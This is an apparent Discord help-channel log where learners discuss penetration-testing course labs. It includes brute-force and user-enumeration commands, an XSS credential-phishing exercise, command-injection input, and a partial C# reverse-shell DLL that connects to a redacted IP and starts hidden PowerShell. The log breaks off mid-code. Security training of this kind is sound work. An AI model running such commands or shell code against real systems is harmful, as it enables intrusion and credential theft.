#modules

1 messages · Page 421 of 1

fathom pendant
#

By "you know the bug" I'm assuming you're using the guide that comes with annual

#

But reach out to support if you think it's broken

primal patrol
#

The "right spot"

fathom pendant
#

I only recall the first few "high" vulns being red herrings

#

As there is one that gets marked "critical" from what i remember

primal patrol
#

Yep

#

That's the problem
The zap active scanner is showing some medium and low vulns but the HIGH one is not even found

#

And yes i waited for it to finish

#

Btw Thanks for even responding dude

waxen totem
#

Did you do AJAX scan?

tiny frigate
#

strange, never seen that before, but just hit me too
Same thing, US East was my default. Does not work for US West either, but for CA just like you said.

HTB team aware of that?

clear seal
#

I guess no one seen this? lol

cloud urchin
#

You can use whatever you want. Not a bad idea to learn other ways through that module though.

waxen totem
#

I'd recommend against it, use the tools taught in the module before using tools that make your life easier. Helps you better understand the fundamentals

clear seal
#

I mean I understand the fundamentals…. Ligolo would be useless to me as well if I didint lol

waxen totem
#

doesn't really matter which tool you choose to use

pulsar shuttle
#

Hi, I've lost access to email what I've used to access my account, have other way to recover my account?

cloud urchin
#

There's always something more you learn in the modules though.

cloud urchin
pulsar shuttle
#

Yes

river steeple
#

Hello everyone

old bramble
#

Module: Attacking Common Services - Easy

I've gotten the user and pw, and am following the course material to get a webshell. But the output isn't coming up in the browser when I run commands. I've changed the directory in the original command to match what I get from the Webserverinfo file, still nothing. Any hints here would be great.

young yoke
#

hey guys how can i exploit a open 80 port?

waxen totem
young yoke
waxen totem
young yoke
#

yeah i am asking for a module

waxen totem
young yoke
#

any module that can exploit por t80

cloud urchin
#

lol

#

which module/section on htb academy?

#

if this isn't academy related it doesn't belong here

young yoke
#

i did it all wrong write 😂

young yoke
waxen totem
cloud urchin
#

what lab

#

you need to be specific

young yoke
waxen totem
young yoke
#

dog lmao

waxen totem
#

Yeah, and be specific

young yoke
#

ok

waxen totem
#

but don't reveal box info

young yoke
#

alr alr

ruby basin
#

Going through the modules for Windows. It spawned the target without displaying the default credentials. Is there a fix for this?

old bramble
harsh mauve
#

When brute forcing a non-standard port with hydra (e.g. FTP), is this syntax correct? hydra -L u.list -P p.list ftp://<IP>:<PORT> It's correct.

wooden seal
#

did u tried resetting?

signal hound
#

Hello
I am doing windows privilege escalation > scf file
I set responder up and i get a hash but its the hash of "htb-student"
How can i get the "SCCM_SVC" user hash?
Thanks in advance

dapper scarab
#

im having a really hard time with the blue team path labs, the windows machines are so slow

pearl ledge
#

https://academy.hackthebox.com/module/103/section/984
Try to find a working XSS payload for the Image URL form found at '/phishing' in the above server, and then use what you learned in this section to prepare a malicious URL that injects a malicious login form. Then visit '/phishing/send.php' to send the URL to the victim, and they will log into the malicious login form. If you did everything correctly, you should receive the victim's login credentials, which you can use to login to '/phishing/login.php' and obtain the flag.

My server isn't listening any request. Anyone have a solution?

frank sun
#

Hey guys!

I'm on https://academy.hackthebox.com/module/113/section/1100

I have added ip and vhost entry in the /etc/hosts file. And I'm on VPN but still can't reach.

Things I tried: which did not resolve it (timeout)

  • used different region vpn file
  • reset the machine and waited 5 mins
  • restart the vm and host machine
  • used space and tab in the /etc/hosts
  • tried sudo for wpscan
  • tried curl, wget - with and without sudo

But I can browse the the same vhost blog.inlanefreight.local after adding the entry from pwnbox(browser based vm from HTB) without any set backs.

Can someone please help me what I'm doing wrong?

this is my /etc/hosts

127.0.0.1       localhost
127.0.1.1       kali

# The following lines are desirable for IPv6 capable hosts
::1     localhost ip6-localhost ip6-loopback
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters

<ip>   blog.inlanefreight.local
waxen totem
#

also ensure that the pwnbox and vpn aren't running at the same time

dapper scarab
#

so the machine I RDP does not have internet connection, do I really have to trasnfer the github from my kaly via RDP...

waxen totem
frank sun
dapper scarab
waxen totem
#

Haven't done that module so I am not familiar with its labs

frank sun
#

still not working

waxen totem
dapper scarab
#

I'm also having a hard time with connecting to a new machine now, target IP is not pinging

frank sun
#

yes, I can ping with 0% packet loss

waxen totem
#

might wanna swap VPNs for both of you, and maybe adjust the MTU, but that's my best guess

frank sun
#

I can reach inlanefreight.local on the browser
This is the inlanefreight.local default vhost

#

tried, still not working

#

how come pwnbox worked with just and without main domain in it
<ip> blog.inlanefreight.local

charred ice
#

https://academy.hackthebox.com/module/110/section/1050
Exercise 2: Try adding a rule that automatically adds ;ls; when we click on Ping, by matching and replace the request body of the Ping request.

Hello. I am trying this exercise. It works but where can I learn regex and is this good?

waxen totem
dapper scarab
#

guys if Im doing the SOC Analyst job role path using a student subscription will getting VIP+ help with the module labs?

#

like peformance wise? Or is VIP+ only for normaly HTB and not Academy

charred ice
dapper scarab
charred ice
#

What do you mean by performance? Both platforms are independant. Only if you get a the yearly plan you have access to both. But student plan only gets you the modules

#

Oh wait. I don't think you get VIP+ labs even on yearly plans of academy

#

Yup you don't it seems. Both the subscriptions are different.

dapper scarab
#

so Im just trying to improve the labs in the module, for example I had to RDP into a Windows machine and it was a nightmare, so I was wondering if buying VIP+ could improve the peformance but I guess not since HTB and Academy are seperate subscriptions

dapper scarab
#

so theres no way to pay for more stable/faster labs in Academy?

waxen totem
dapper scarab
charred ice
dapper scarab
#

idk about that, time is money and if the module labs are slow/buggy is just a matter of time before the learner quits and doesnt come back. I see it as an business opportunity, offer high performance on the Academy labs in the high subscriptions

charred ice
#

Module labs/assessments are very fast. I have never encountered a slow response

dapper scarab
#

does the Gold subcrioption actually provide faster and more stable labs? "Priority" I dont see any mention on the billing page, I will be very interested in upgrading if so

waxen totem
dapper scarab
#

awesome thank you!

autumn pilot
#

For any issues you experience with the VPN and the connectivity, it is best to reach out to support for better troubleshooting

thin citrus
#

Can someone help me with Prototype Pollution RCE (Whitebox Attacks), I am trying to follow the steps but the command injection is never executed in the provided application. Also in the debug console log I dont see this:

#

But only this:

viral vigil
#

anyone here solved planning machine im stucked help me

waxen totem
thin citrus
#

Even when I clear it and set the command in Debug console, it is never executed and here is the correct Debug Console image:

bright coral
#

That section is basically a walkthrough. You pass the $Cred variable as -Credential parameter in the following commands and that uses this context for authentication instead of the local user.

west arrow
#

but 'whoami' doesn't change

thin citrus
#

Also tried with the 'constructor' to bypass "__proto__" still no luck, Can I DM someone for support?

bright coral
west arrow
#

Ah okay, thanks a lot

steady cove
#

Hey there, has anyone worked on the "Introduction to Splunk & SPL" Module, I would love some help!

shut ice
#

Can anyone point me in the direct for getting Havoc beacon via xp_cmdshell? Done it in the past using Powershell payload but Havoc doesn't support this afik

strange delta
#

hi everyone. im stucked at AD Enum& Attacks module DCSync section. i cant ssh into the linux host as it says during the section (i got wrong creds error). can someone help me?

gray yacht
shut ice
low seal
#

I have a question regarding SMTP user enumeration, it seems like the "smtp-enum-users" cannot identify the correct users if a user list is provided.
has anyone else faced this issue?
For instance, smtp-user-enum -M RCPT -U users.list -D inlanefreight.htb -t <ip>
won't give any valid user even if the valid user is in the user.list

fathom pendant
#

There's more than RCPT

#

VRFY for instance, exists

#

And depending how it's set up; you may need a domain

low seal
#

I tried all three, also the module solution did the same thing I did and it did got the user

#

interesting thing is that if we specify the direct user instead of a list, -u <user>, then it does indeed detect that user as valid

fathom pendant
#

Try messing around with the timing

#

I believe it's -w or -W (been a minute)

#

It could be that the tool is going too fast and not waiting on the response

low seal
#

yeah I played around with the timing the issue still persists, even on the attack box

fathom pendant
#

did you try setting the timeout to 20+ seconds?

waxen totem
#

you can also try the metasploit one or the nmap script

fathom pendant
#

i just did it myself, set timeout to 25 seconds, and it came back
<ip>: <username> exists

low seal
#

I tried 50 and 100 too same thing, thanks though

low seal
fathom pendant
#

i used the provided footprinting-wordlist

#

i'm assuming you're referring to the footprinting: smtp section yeah?

low seal
#

yeah I used the worflist provided in the resources tab, to be exact I am doing in the easy lab of Attacking Common Services.

#

I just restarted the machine and the issue just got resolved.

#

kinda weird

fathom pendant
#

@zinc halo don't reveal information about a skill assessment; the short answer is - logical thinking
why is it password protected
can it be reused
try reusing it

zinc halo
#

okie, yah that make sense i guess, thanks!

#

i did not know it could be reused like that but good to know now! thanks!

fathom pendant
#

it can be; doesn't mean it should be :) best practices

zinc halo
#

ah.. i seee

fathom pendant
#

but consider that the user is a sysadmin or some such role and should have those types of rights/access so best practice is

  • limiting access to root user ✅
    however
  • reusing a credential ❎
#

this happens in the real world too

#

humans are lazy

low seal
#

I wonder if such issue pops up in exam

zinc halo
#

oh yah that make sense i was just wondering how it could be reused like that then i found out you could place that certain file in a certain folder for it to be reused, thanks!! this is really helpful

low seal
#

when do I knnow to reset a machine

fathom pendant
low seal
#

I see

#

thanks

fathom pendant
#

if you're unsure the env is broken, you'll have to reach out to support

#

but you can reset the environment unlimited times

low seal
#

understood

vernal tapir
#

Hi there, I'm on Windows Priv Esc > Further Credential Theft.

Been stuck on flag two for the last little while, I used Lazagne on user jordan to find the first flag, I now have RDP access into a higher privileged user, still not getting much for flag two. I've tried everything in this module, couldn't find any PuTTy Sessions, nothing in SessionGopher etc... Would love a hint if anyone could help thanks.

potent geyser
#

Hello

#

I’m new at ethical hacking

#

I want be a good hacker or coder

#

But i don’t know much

#

Like ik html a bit and a bit python

#

Can anyone teach me how can i be a good hacker please

prisma flame
#

hi

vernal tapir
#

Nobody will teach you for free, we ALL pay for it. So can you

keen pewter
#

i cant get my RDC to connect to the target system it says server not enabled computer is turned off not available on the net work

#

do i need to have the vpn turned on first?

vernal tapir
#

Yes you need to be connected to the VPN

keen pewter
#

ok thank you

prisma flame
#

hi

vernal tapir
keen pewter
#

so i shouldn't connect with my personal pc?

vernal tapir
#

Is it your attack machine?

#

If it's a personal machine, no 100% dont

fathom pendant
#

you should be connecting with whatever machine you're using to do the content with

vernal tapir
fathom pendant
#

i.e. if you're using a VM; you connect in the VM, not on the Host

keen pewter
#

ok i will just stick with the vm that is for use

vernal tapir
#

Yes, the pwnbox is just as good 🙂

vernal tapir
proper sierra
#

Hi guys.. I need help
I’m in public exploits (just getting started) section and I’m doing the challenge
I know how to exploit the vulnerable plugin with metasploit but it’s not working.
It does not output what I want.
I have tried exploit db python script and it’s the same issue.
I looked in the specific code to get the exact url I need to exploit the vulnerability but the request is timed out and doesn’t return anything.

Did anyone encounter this problem?

sage void
#

I’m stuck on the pass the hash section I’m trying to get the reverse shell from DC01 I’ve used to the reverse shell command and it says command executed but I’m not getting a connection on my nc listener

fathom pendant
proper sierra
sage void
#

I’m running ps as admin and used mimikatz for the user Julio any hints to a step I’ve might missed

fathom pendant
fathom pendant
sage void
#

I did not

fathom pendant
#

if it's the portion i'm thinking; whenever there's a black background, the command is expected to be run in cmd; blue is ps

sage void
#

Okay I was confused on that part

#

Thanks

fathom pendant
#

i believe the text also tells you to run it in CMD

#

or Command Prompt

vernal tapir
#

Do you need to use proxychains?

#

Just trying to remember when I did it

cold star
#

Hey, Guys I am stuck at this question: Using David's hash, perform a Pass the Hash attack to connect to the shared folder \DC01\david and read the file david.txt. ..... under the password attacks pass the hash module. I have authenticated as David user with the hash but still it's giving not enough rights

fathom pendant
#

@north bramble please don't share passwords -_-

cold star
fathom pendant
wet arrow
#

Hi people!

I'm currently unable to work on a final skill assessment. As soon as I log in using the credentials provided for the exercise, I get kicked out immediately. The system shows the following message:

"Connection reset by peer client_loop: send disconnect: Broken pipe"

Could someone please assist me with this issue?

Module: Linux Privilege Escalation
Page: Linux Local Privilege Esclation - Skill Assessment

north bramble
vernal tapir
fathom pendant
vernal tapir
vernal tapir
wet arrow
vernal tapir
cold star
# cold star Yea

also used psexec but yea still permission error even when I am authenticated as david with admin

vernal tapir
#

Vans, can I dm?

cold star
sage void
#

I still can’t get the reverse shell when I try to run the commands in black (cmd) at the top of it it says it’s in powershell but it’s in black

shut ice
#

Anyone know if GodPotato is patched? Trying it on Win11 and WinServer2019 and get this error

[*] CurrentUser: NT AUTHORITY\SYSTEM
[!] Cannot create process Win32Error:2
fathom pendant
fathom pendant
shut ice
#

It's in one of the modules

fathom pendant
#

ok but are you doing it on a module, or no -- that's the key distinction :)

shut ice
#

I'm working through the module and testing it on my VMs

#

I'm asking if it's patched since it works in the module but not on my VMs

fathom pendant
#

if it works on the module i wouldn't really be concerned. ¯_(ツ)_/¯

#

it's likely just a minor thing

#

testing on your own vm != doing it within the module

shut ice
#

huh, it's an academy for learning... ?

fathom pendant
#

if it's working on the module, and not on your own vm => the question belongs in a different channel

sharp torrent
#

can someone help with active directory dcsync section. There are two ip's given at the end of the subject assessment.. I can rdp into one but what is the other for ? I tried to ssh to it w/ adunn and htb-student creds and I cant. Help would be appreciated.

#

thanks

fathom pendant
#

is it something like ea-attack01 or ea-parr01 r something like that?

keen pewter
#

i can't see the Windows taskbar when connecting to the VM that you gave us access to if i hit my windows key it pops open my windows also is that something i am just going to have to deal with?

fathom pendant
#

the credentials are given in like the setup section of the module

sharp torrent
#

yup, first box is ACADEMY-EA-MS01, second box is ACADEMY-EA-ATTACK01

fathom pendant
keen pewter
#

thank you

fathom pendant
potent geyser
#

Hey guys i want to use any good browser but what browser should i do people says fire fox is good but others says duck go duck is good wich one

fathom pendant
#

firefox is fine, so is ddg, it's just personal preference really

keen pewter
#

ughh quick question, do I type that command in bash ?

fathom pendant
keen pewter
#

thank you

#

for being such a helpful person 😄

#

i would have figured that out if i just use man xfreerdp sorry >.>

fathom pendant
#

another nifty thing that plenty of us use with xfreerdp is the /drive: option :)

keen pewter
#

ill have to google that because im not understanding the 2ed part of the description

forest tendon
#

that latest version of xfreerdp is xfreerdp3 incase you guys runinto STDERR

#

plus i would really love some mentorship from the senior hackers , i have completed the windows and linux fundamentals now should i complete this module or should i go into another module since i'm not really looking to be an android pentester this summer. What should i do?

#

@craggy urchin Thank you !

zinc halo
#

Hi there, for one of the module, i got a valid username and password for rdp, but crowbar doesnt seem to see it as a valid credentials when i try to bruteforce the rdp using that exact username and password, any idea why that would be the case? thank you!!

forest tendon
#

did you check the wordlist for any blank spaces?

zinc halo
#

yah i did

#

so weird

forest tendon
#

what command did you use?

zinc halo
#

crowbar -b rdp -s xx.xx.xx.xx/32 -u username -C test.list

forest tendon
#

if you have the target ip address why use the entire subnet?

zinc halo
#

the only thing i could think of, is when i install crowbar it was asking for xfreerdp but i am using xfreerdp3 so i created a symlink for them

forest tendon
#

try it with the target ip address rather than bruteforcing the entire subnet mask

zinc halo
fathom pendant
#

no

zinc halo
#

no?

forest tendon
#

nope 🙂

fathom pendant
#

why are you doing /32? at all

zinc halo
#

coz crowbar would not work if there is no CIDR specified no?

#

one sec ill try it

fathom pendant
#

it should work without a cidr

forest tendon
#

check the tool's help page

zinc halo
forest tendon
#

and find out the argument that can be solely used for targeting the singular ip address

zinc halo
#

thats what it was telling me

#

if i get rid of CIDR it does not wanna run

fathom pendant
#

looking into it; it looks like /32 is intended for single ips with crowbar

zinc halo
#

i got it from the kali tool page https://www.kali.org/tools/crowbar/

fathom pendant
#

and -p is for specifying a port

#

though i personally didn't use crowbar for bruteforcing rdp; i used hydra

zinc halo
#

yah i tried hydra it is taking forever for me thats why i saw it on the forum to try crowbar 😦 but for some reasons it doesnt wanna work

forest tendon
#

@zinc halo does the list for credentials solely specifies passwords or the usernames too?

fathom pendant
zinc halo
#

and the valid one as well

fathom pendant
#

if it's one password you can just use -c 'password'

zinc halo
#

true ill try that as well one sec

fathom pendant
#

it also helps if you say what module you're working on

zinc halo
#

nope doesnt wanna work 😦

fathom pendant
#

instead of just saying "in one of the modules"

zinc halo
#

i was trying not to sploi it

fathom pendant
#

dude, fr

zinc halo
#

ppassword attacks lab - hard

fathom pendant
#

the spoiling is if you specifically say what the password/username is

zinc halo
#

sadglas i just got warned earlier

#

fair

fathom pendant
#

or if you reveal the password in a screenshot, or a flag, etc

#

i assume this is for the first question? how did you determine that the password is, in fact, correct, have you tried other tools besides crowbar?

zinc halo
#

yah i got it from hydra, and it worked for rdp but i thought i wanna try it to see if crowbar is indeed faster but

fathom pendant
#

could also be that it's timing out before crowbar gets a response

zinc halo
#

it doenst seem to wanna work

forest tendon
#

@zinc halo try removing the subnet and use the -s command e:g -s <targetip>

fathom pendant
#

respectfully

#

looking into it; the /32 is required for single ips

forest tendon
#

@fathom pendant yes i'm looking at the man page but i found the static target option

fathom pendant
#

-s is literally the option they're using

forest tendon
#

@fathom pendant sorry did'nt focus on the keyword arg there

fathom pendant
#

also as a note @zinc halo you can use 10.129.x.x for the outward facing ips for private targets, that's not really a hidden fact

zinc halo
#

yah increasing -t does not work either 😦

opal basalt
#

Hi everyone, I'm doing skill assessment part 1 from login bruteforcing from CBBH, and if you are wondering yes, I'm using the given username and password list but will these even take lot of time to crack? , It is atleast showing me 3h to crack using hydra

fathom pendant
opal basalt
fathom pendant
#

just have patient

opal basalt
fathom pendant
#

as a note: always start with the wordlists given

#

then branch out

#

use wordlists that the module may have mentioned

#

as a LAST resort use rockyou

opal basalt
fathom pendant
#

generally speaking if the skill assessment tells you to use a specific wordlist, download/use that wordlist

opal basalt
#

I again downloaded it properly and it was an instant finding

fathom pendant
#

Oof

midnight orchid
#

hi

#

i have a question

#

i m doing a machine in htb named planning

#

the ssh port is open

vernal tapir
#

If I'm able to find credentials for modules ahead of what I'm learning, does that mean I'm probably going too out-of-scope with my lessons?

midnight orchid
#

when i do and put the pass it says wrong pass

vernal tapir
#

Wrong section, please go to #boxes

midnight orchid
#

but the pass is given

#

bro

#

rly

#

can u help me

vernal tapir
#

i can try

#

dm me, pls dont spam the chats

midnight orchid
#

ok

fathom pendant
#

Also you mean sections, not modules

#

Modules are the learning units, sections are the chapters within the units

vernal tapir
#

And yeah I totally getcha, When I get stuck I'm using the other content to try to get ahead without having to look back at questions, getting answers for things I shouldn't be getting yet lol

fathom pendant
#

I think in one of the modules I captured like all the hashes lol instead of going back and forth

vernal tapir
#

Does anyone know if "+clipboard" with xfreerdp can copy/paste files? I've been trying to learn an easier way to transffer files from target to attack machine

#

lol yea i can def relate to that

fathom pendant
#

Yes +clipboard enables clipboard, though usually it should be enabled. +clipboard allows for easier copy/paste

vernal tapir
#

how come you never went for CPTS Marcie? Idk if you've been asked a million times but I seen ya here when I first joined and shocked you havent got certs

fathom pendant
#

Xfreerdp has the /drive: option though for mounting a local directory to the session

fathom pendant
#

I really don't feel like answering it a million times

vernal tapir
#

You didn't have to explain it sorry lol

#

But thanks for the insights on clipboard/freerdp I'll give that a shot. Sorry to disturb, take care & have a lovely day

vestal swallow
#

Hi everyone,
I have a little question about one optional exercise in the module "Cracking Passwords with Hascat" in the section "Cracking Common Hashes" the optional exercise about ntlmv2 and ntlm i still don't get how i'm supposed to get to the answer.

I hope someone can give me a clue.

Thanks for the help

tacit ore
#

Does HTB want me to follow and execute the steps they do/talk about on my "own" VM: Pwnbox? i'm just clueless that why i wonder. thanks in advance!

tender nimbus
#

Hey guys, module: Introduction to Malware Analysis section: Dynamic analysis, when Im stopping Noriben, It don't want to save the logs from procmon? ANy Idea?

atomic ridge
#

Help, I’m stuck on the medium level for the enumeration with Nmap lab

#

Also just for another point of view, how can I get info on how other people solved the easy lab

tame basalt
#

If not that one, haven't done it yet 😄 It's a part of the basic toolset

vestal swallow
#

Hi everyone,
I have a little question about one optional exercise in the module "Cracking Passwords with Hascat" in the section "Cracking Common Hashes" the optional exercise about ntlmv2 and ntlm i still don't get how i'm supposed to get to the answer.

I hope someone can give me a clue.

Thanks for the help

fathom pendant
fathom pendant
tame basalt
vestal swallow
fathom pendant
#

Look up ntlm and windows

#

Ntlm hash of the user is in very basic terms the password hash of the user

vestal swallow
fathom pendant
#

Google is powerful, and you can expand the info beyond strictly what's taught

vestal swallow
#

Okay i'll continue to search thanks for ur help and have a great day.

foggy snow
#

anyone else having difficulties connecting to targets?

dry mesa
#

Hi - On Getting started - Service Scanning- How am I supposed to find bob's password to connect to SMB for the last question?

tame basalt
tame basalt
fathom pendant
#

His pw is in the reading

tame basalt
#

reading carefully often leads me to the answers across many modules 😛

foggy snow
#

Im doing Pass the Ticket (PtT) from Windows within the Password Attacks module but I can't seem to export the tickets no matter what I try.

autumn pilot
#

reach out to instagram's support, we can't help

gray yacht
foggy snow
#

yea

#

Also tried in both PS and CMD

#

tried with both Rubeus and minikatz

gray yacht
foggy snow
#

Thanks!

brisk ruin
#

Evening I have been struggling with the following question for the past couple days now:

Reproduce all the debugging procedures mentioned in this section and provide the hidden shellcode-related hex values from the final screenshot as your answer. Remove all spaces.

In the walkthrough, the following changes are to be made to avoid triggering "Sandbox Detected

1st change: cmp dword ptr ss:[rsp+0x30], 0x1 to cmp dword ptr ss:[rsp+0x30], 0x0

2nd change: je shell.402F09 to jne shell.402F09.

3rd change : jne shell.402CD0 -> Changed it jmp shell.402CD0

#

I'm still geting a sandbox detection

#

Introdution to Malware analysis Debugging section

fathom pendant
#

it should go without saying to not visit that discord link that was posted if you saw it

foggy monolith
#

How long is MailSniper.Get-GlobalAddressList supposed to take? What does it mean by "This may take a while"? Forever? Been waiting at least an hour for it to run.

(MSSQL, Exchange, and SCCM Attacks § Exchange § Enumeration)

fathom pendant
#

that's not what this server is about

potent geyser
#

Oooo

fathom pendant
#

i don't advise on admitting to illegal activity :)

potent geyser
#

Sorry for misunderstanding, i was just worried because i’m trying help people for not get scammed

fathom pendant
#

read #welcome to see what this server is actually about

#

that's great and all; but this server isn't about hacking scammers

potent geyser
#

I won’t do this mistake anymore, hope you forgive my mistake for what i did.

#

Hey why is my name owen mc verify?

#

Who did that??

foggy monolith
potent geyser
#

Oke

fathom pendant
potent geyser
#

DAYMMMMMM

#

IM TRYIN CREATE HACK THE BOX ACC

#

I PUT NAME LAST NAME AND THINGS IT SAYS ITS TAKEN

fathom pendant
#

chill

#

no need to put caps

potent geyser
#

bro i’m stressed i been 1 hour trying

fathom pendant
#

then i guess be more creative with your username idk what to tell you

potent geyser
#

I been more creative than i be at school

#

With the name

fathom pendant
#

¯_(ツ)_/¯

potent geyser
#

Even my cat is confused🤣

#

Anyways

#

Can you js do any other name not owen mcVerify 🥲

fathom pendant
#

no

#

it's not up to me to decide

potent geyser
#

Oooo-

#

Then who? Decides??

fathom pendant
#

the robot overlords

#

also this is all irrelevant to the channel topic

#

so i'm gonna put an end to the convo here

potent geyser
#

Aah alright

fathom pendant
#

if you're having issues coming up with a username for HTB; idk use a random name generator or something

potent geyser
#

I’m going sleep Marcie, God bless you

fathom pendant
#

mashallah

potent geyser
#

Yoo ya muslim(?

fathom pendant
#

no; also irrelevant

woven skiff
#

Hi can someone help me with the HTTP Attacks Log Injection I can t figure the way to get an RCE

gaunt forge
#

the linux privesc assement is currently unplayable

#

it kicks me out of ssh after about 5 seconds, and i get other ppls history when i use that command

tall stag
#

guys what results should I trust for find command results: ssh from your machine or HTB pwnbox? They seem to show different results for similarly worded find command? Why is this even happening? I thought all target machines are the same? I see more results in pwnbox than ssh method.

fathom pendant
#

pwnbox is NOT the target; running find in the pwnbox environment is just checking the pwnbox, unless i'm misunderstanding

tall stag
#

Correction: i used bash in pwnbox

fathom pendant
#

that doesn't clarify anything

#

are you ssh into the target from pwnbox; or running the find command in pwnbox

tall stag
#

Okay let me clarify

#

I was doing the Linux Fundamentals: Find Files and Directories. I did the the command find / -name *.conf 2>/dev/null

#

first on my machine ssh to target machine using terminal

gaunt forge
#

yeah what in the world im sshing into the same machine, and when i ssh into it once I see nothing, a normal setup. but i ssh into it again and i see someone elses history they tried to use for this machine before I get disconnected

tall stag
#

then i did the same thing to bash in pwn box

gaunt forge
#

I tried switching servers but I'm on the 3d us server and the same issue is happening

tall stag
#

I get a different list

#

different list of files.

#

the bash results from pwnbox on find command is way more extensive than ssh to the target machine.

fathom pendant
#

the pwnbox is it's own attack machine, independent of the target spawns

#

you'd still need to ssh to the target from it to perform the tasks

fathom pendant
#

so yes: the pwnbox will have a different list than the ssh to the target... because the pwnbox is NOT the target

#

as i said prior

#

pwnbox => attack box alternative to using your own vm
target => the thing you attack/connect to to perform the tasks (if required) by the section

tall stag
#

Got it. That make sense now.

fathom pendant
#

note: you should not be using the pwnbox and your own vm at the same time when attacking targets, due to how the vpn packs are handled - the Internal IP provided (tun0 ip) is hardcoded into your vpn pack, and the pwnbox utilizes this same pack (automatically on startup) to connect so you get 2 devices with the same IP on the same network... (not good)

tall stag
#

That probably explains why my machine slows down or even hangs when i do that.

#

I will avoid that next time.

foggy monolith
#

Why does WSL curl keep timing out on the section of MSSQL, Exchange, and SCCM Attacks dealing with Exchange version enumeration?

thin parrot
#

Serious question here for anyone who has been studying for a while… did you ever hit a point where you lost all energy for this? Near the end of April I got sick and I haven’t been able to get myself to do anything on htb since. I’ve never felt a burnout like this in my life. It’s like all the joy I got out of this is gone

#

1/3 of the way through the pen testing path

vast crest
#

Gotta find that spark again.

fathom pendant
#

take a break; let your mind rest; don't force the issue

#

do things unrelated to htb

#

maybe some coding projects

#

you'll get back to it when you're ready, but forcing yourself when you really don't want to do it is just gonna make the feeling worse

steel snow
#

Hey! excuse me, i am getting a lot of broken pipe when connecting with SSH

#

is anyone noticing a similar thing?

waxen totem
#

Otherwise try and changing your VPN interface MTU

steel snow
#

probably, i will check that!

clear seal
#

This isn’t related, but, how come I can’t talk in general chat and stuff?

waxen totem
steel snow
#

ehhh my name just means red in japanese

cloud urchin
#

They combined the accounts some time ago, should be the same account now

cloud urchin
#

one account to rule them all

steel snow
#

ahhhh i really couldn't get the code because of the broken pipe issue, i changed the VPN server too

waxen totem
#

This is not that kind of server we don't allow any services like that here

rustic sage
#

Oh sorry

bitter umbra
#

Attacking Authentication Mechanisms module's "Attacking the Signing Secret" section, I cracked the JWT token and forged the token with the secret key and changed the isAdmin to true, but the server won't accept it. It says "Token is Invalid".

I believe I am doing every step right, but I've hit the wall. Was anyone in the same situation before? If so, can I get a hint on how you solve it?

vernal tapir
wooden seal
hexed oyster
#

Fuck yeah, buddy.

#

... and I just figured out the thing that I was stuck on, too!

buoyant whale
#

hello

cloud urchin
fathom pendant
#

Reminder that even if you use spoiler text: posting spoilers is still not allowed -_-

earnest yew
#

Sorry, I tried not giving too much away but wasn't sure exactly how to explain the steps I had taken so far without some of that key info... Any tips on how to better provide context without rule breaking?

storm elk
earnest yew
#

That's fair, I did a search and tried to organize my ask as others did. Ill keep that in mind, sorry guys!

storm elk
#

No worries at all

#

But did you get the answer you need? I can have a look when I get on my pc in an hour

earnest yew
#

Yeah I solved it on my own and added an edit to the end of it.

storm elk
#

Okay 👌

hexed oyster
#

so... PHP just kinda is a web shell, huh?

waxen totem
wooden seal
#

Python Library Hijacking (Linux privESC)
when trying to follow along with example (as the question said)
getting this

#

i do have the privs to run it as root tho without password

cloud urchin
#

@blazing loom I know Getting Started is tier 0, but still please don't give solutions to the challenges.

blazing loom
#

Ah no problem. I figured since it was already in several other messages in this channel that it was already spoiled. But I'll refrain in the future regardless.

tawdry palm
#

currently doing linux priv esc skills asses and when connecting via ssh i get instatnly disconnected. anyone had this issue?

safe star
#

did you only put the target ip address inside the reslovers.txt

waxen totem
#

he means, did you make sure that all the other resolvers are commented out?

safe star
#

only ip in the file?

little terrace
#

hi im doing the information gathering web edition,
on the skills assessment using recon spider
python3 ReconSpider.py http://<subdomain>.inlanefreight.htb:<port>

doesnt work for me, ive correctly found it with gobuster but reconspider just refuses to work

little terrace
#

yup checked both of these

little terrace
#

the skills assessment

molten comet
#

anybody can guide me on android fundlementals module how to set up the testing environments?

little terrace
#

yea it does, just did it, theres content in the results.json

waxen totem
wooden seal
#

are they trolling ?

little terrace
#

damn.. thanks man that helped a lot

waxen totem
#

I guess they meant to try and see if it works

little terrace
#

nono its fr, i kept thinking the first subdomain was correct but i just needed to enum more

swift sundial
#

Anybody eller have issues with ssh on academy? Trying to ssh in on linux file transfer methods but keep getting broken pipe and get disconnected.

#

htb-student@nix04:~$ gunzip Read from remote host 10.129.227.45: Connection reset by peer
Connection to 10.129.227.45 closed.
client_loop: send disconnect: Broken pipe

Didn't have time to complete the command 🙂

#

Tried both vpn and pwnbox.

little terrace
#

also, why is there a diff between HTB recon spider and kali's reconspider, is there no where else i can get HTB's version

swift sundial
#

Ok, I'll try that thanks 🙂

tawdry palm
#

On Linux priv esc

silent wedge
swift sundial
#

Didn't work changing VPN and looks like a few others have same problem.

#

Yah! Thanks for taking your time

uneven obsidian
#

hey, i am doing the SQLMAP essential module and I try to input flag5 content as the answer but for some reason it's not working, any adivce?

wary wren
#

can anyone help me i am not getting reverse shell back in password attacks pass the hash question

#

i feel like i am doing everyhting correct it also say executed but i dont get shell

#

Using Julio's hash, perform a Pass the Hash attack, launch a PowerShell console and import Invoke-TheHash to create a reverse shell to the machine you are connected via RDP (the target machine, DC01, can only connect to MS01). Use the tool nc.exe located in c:\tools to listen for the reverse shell. Once connected to the DC01, read the flag in C:\julio\flag.txt.

opal basalt
#

My english is weak or I'm not getting this . From the module Boken auth CBBH, this phrase is worded so weirdly i can't seems to understand what it is trying to tell me .prayge

gritty light
#

Windows Evasion > LOLBAS: RunDll32

For some reason I keep getting this error when attempting to run my Dllmain function Missing entry: Dllmain

I did install the NuGet DLL Export Package and compiled with Release ANY,x64,x86, I did NOT get prompted to Reload All

#
using System;
using System.IO;
using System.Net.Sockets;
using System.Diagnostics;

namespace RShell_D
{
    internal class Program
    {
        private static StreamWriter streamWriter; // Needs to be global so that HandleDataReceived() can access it

        [DllExport("DllMain")]
        public static void DllMain()
        {
            try
            {
                // Connect to <IP> on <Port>/TCP
                TcpClient client = new TcpClient();
                client.Connect("<REDACTED-IP>",1010);

                // Set up input/output streams
                Stream stream = client.GetStream();
                StreamReader streamReader = new StreamReader(stream);
                streamWriter = new StreamWriter(stream);

                // Define a hidden PowerShell (-ep bypass -nologo) process with STDOUT/ERR/IN all redirected
                Process p = new Process();
                p.StartInfo.FileName = "C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe";
                
                p.StartInfo.Arguments = "-ep bypass -nologo";
